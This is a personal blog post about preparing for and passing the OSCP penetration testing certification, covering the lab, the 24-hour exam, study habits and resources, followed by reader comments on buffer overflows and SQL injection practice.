Down with OSCP?? Yea, you know me!

Back in February of last year, I had finally saved up enough pennies to purchase the Penetration Testing with Kali Linux. I was not fully aware of what I was getting myself into, despite reading the syllabus. As a side note if you are planning to take this course, please prepare yourself for the headaches, frustration, and especially…time! You’ll need quite a bit of that. Make sure you are decent with networking, and know your way around a Linux environment or you are going to be hurting. Basic knowledge of scripting with your favorite language is always a plus 🙂

If you aren’t already aware, you should be if you’re reading this, the PWK is a very technical course that throws curve balls and actually tests your technical ability. I entered the course not knowing very much besides using a tool here and there and hoping stuff works as any other new guy does. I was really excited when I came across Offensive Security and immediately knew this was the one for me.

To purchase, you need a non-free email e.g Yahoo, Gmail, any of the like. If you were like me and use one of those, you had to provide additional ID. In my case, I just used my drivers license. Finally after waiting a week, I received my material.

The Lab

The lab…the lab is like no other. It’s your very own playground that ranges from Windows XP, Windows Server, Linux machines, Windows 8. You name it, it’s in there. This is the spot to practice what you learn from the videos and/or PDF. It consists of your public network, IT, dev, and your admin departments. You will be doing webapp, binary, and client side attacks. You will also be doing privilege escalation and…PIVOTING. That was a crazy concept to wrap my head around, but was finally able to get it 🙂

The awesome thing is…since this is a self-study course, you’re essentially thrown into the deep end of the water. It’s just you, your material, and your lab time with no sense of direction. Sounds so scurry!! I was able to get quite a bit of machines. Unfortunately, I wasn’t able to unlock the admin network. Bummer. It’s not too bad I suppose.

The EXAM

The exam is 24 hours. Depending on your ability, it can take you as little as a few hours or take up to almost the full 24 hours…hopefully, that won’t be you! 😮 If so, who cares?! 🙂

I read the PDF that gets sent to you telling the dos and don’ts. Also has the restrictions of Metasploit. Whoa. Ok. You can only use it once and ONLY once.

First time I login to the network…it was alien to me. I had ran my scans and I already knew I wasn’t ready. Unfortunately for me, this isn’t like any other OSCP Review where I pass on the first round. So I did what any other normal person would do…bought an extra 30 days and fight the good fight, haha!! They weren’t consecutive though.

I spent several months learning and going over the course material again. This time, hanging out in the Exploit-DB and going over exploits and how they’re made and dabbling more and more in Python. Everything started coming together more and more when I started and for the next several months…I was breathing sec. Living it, learning it, loving it 🙂

Path to Redemption

After my 30 days were up, I created my own lab with known vulnerabilities and gave myself a variety of exploits to play with. Spent more months, an ungodly amount of man hours, and lots of keyboards learning everything I could and everything that was covered in the material. I felt so proud of myself because I was steering myself away from being dependent on Metasploit. I had finally put my big boy pants on 🙂 During the course of this time, I focused mainly on buffer overflows, privilege escalation, scripting, porting Metasploit exploits and generating payloads using MSFvenom due to them killing off MSFpayload and MSFencode. By the way, MSFvenom for the win!! I also got in the habit of making Google and Exploit-DB my friends 🙂 You only get one use of Metasploit, but I made the choice to not use it at all with the exception of the multi/handler which isn’t as bad as it sounds. I purchased an extra 15 days, and compromised more machines and got comfortable with what to do. I signed up for my exam once again.

Alas! The test day has arrived! So logging in…I started enumeration on my target machines and actually knew what I was doing this time. There were a couple easy ones and a few tricky ones. The tricky ones outweighed the easy ones, haha! A little more than 10/11 hours in, I had documented everything I have done for my report and gained root/admin privileges on all machines except one. That one. And it was giving me quite a fight! After a couple more hours, I threw in the white flag and called it quits 🙁 I lost. It won the fight. It took me a little bit of time to complete, but you know what? I was able to gain root/admin on 4 machines and limited shell on 1. Limited shell is better than no shell. I  called it a day 🙂

Next thing to do was to write the report and submit my documentation! Oh! Did I mention that you need to write the report WITH the screenshots of your loot as well?? If you don’t submit, you just don’t pass 🙂 You’re given another 24 hours to complete the report. Once I emailed my docs, I waited for my results 🙂

Hanging out at work, I received an email at 10:26am on October 21 stating I had received my OSCP Certification. What a feeling that was! I threw the papers off my desk, knocked the computer over and walked out the office like a BOSS. Then went back inside because I still needed my job.

My Thoughts

This course was fairly difficult, but I had such an AMAZING time doing this and learning along the way. All my hard work had finally paid off. There are plenty of resources online to guide you in the right direction. If you put forth the effort, dedicate the time, try for yourself and not get spoonfed…I promise you, you can do it also!

Also, this course isn’t for you if you are the type to want to get spoonfed. You’ll find out really quick, haha! Anywho, I Tried Harder and became part of the Offensive Security Certified Professional club 🙂 W00t!!

For those of you that are thinking of taking this course, please do! It’s highly rewarding!! And remember folks….ENUMERATION IS KEY!!!

My next goal is to work on Cracking the Perimeter. I still have a few things to learn, and I’m almost positive I’m a sadist due to all the pain the PWK has caused me…yet here I am, begging for more!

Some resources you may find helpful are:

  1. Fuzzy Security
  2. G0tmilk’s Privilege Escalation
  3. Google, hehe 😉

4 thoughts on “Down with OSCP?? Yea, you know me!

  1. While reading this it has given me alot of insight into the end test and that with dedication and perseverance anything is possible! Good job bro keep up the awesome work !

    -SP

  2. I’ve learned so much on your blog, I just finished the IMF vulnhub boot2root and it was a crazy challenge complete with a socket based buffer overflow for a custom program, I was able to do it w00t. It took me about 6 hours due to some hiccups along the way (certain libraries not being installed locally to run the program with gdb, learning new techniques, etc) but overall I felt a lot more confident in performing a bufferoverflow out the box so to speak. It was a little different using gdb isntead of windows based disassemblers — anyway one thing did make me a bit nervous for the OSCP, I had to use sqlmap to perform the sqli as it was full blind. I know I can’t use sqlmap with it and that’s in and of itself not a problem, I can do a generic union based sqli and even evade some WAFs, but when it comes to a time based one or full blind in general I end up needing sqlmap. I can get it to start delaying to let me know it’s accepting my queries but I don’t know what to do when I can’t dump to the page.

    What are your suggestions? Would you say SQLi is limited in complexity on the OSCP?

    Also finally dropping metasploit (also except for the multi/handler) is such a great feeling. No disrespect for the tool, but damn low level knowledge beats all.

    Anyway, thanks for all your help! Good luck on CTP!

    1. I’m glad you did man! I’m sure there were some parts that blew your mind but you kicked ass and got that sweet, sweet shell 😉

      No need to worry. My web game is pretty horrible and I will be the first to tell you that! You really can’t use sqlmap because it’s an automated exploitation tool. What do you learn from that?? 😉
      Believe it or not, it is actually encouraged to practice using tools (sqlmap/metasploit being some examples). If the web game is were you want to end up heading down, by all means go for it! I see you running into no problems that will make you give up. Just don’t quit 😉

      As for your SQL question, I can’t really answer that as some peoples levels are higher/lower than others. If I was able to get buy and successfully exploit it in the labs, I’m sure you can too. My biggest recommendation would be to hangout in the Exploit-DB site in the web section, search for sql, download the provided application, install it, and go to town! That’s how I did it and I learned just as much setting it up just to break it. It was an interesting ride that’s for sure. That goes for everything else on that site. It’s good exercise. I would also suggest turning some of the DoS pocs into full blown rces. That would be sickk

      I know exactly how that feel is. Keep kicking ass man and don’t give up! Remember, if it were easy, everyone would be doing it 😉

Leave a Reply

Your email address will not be published. Required fields are marked *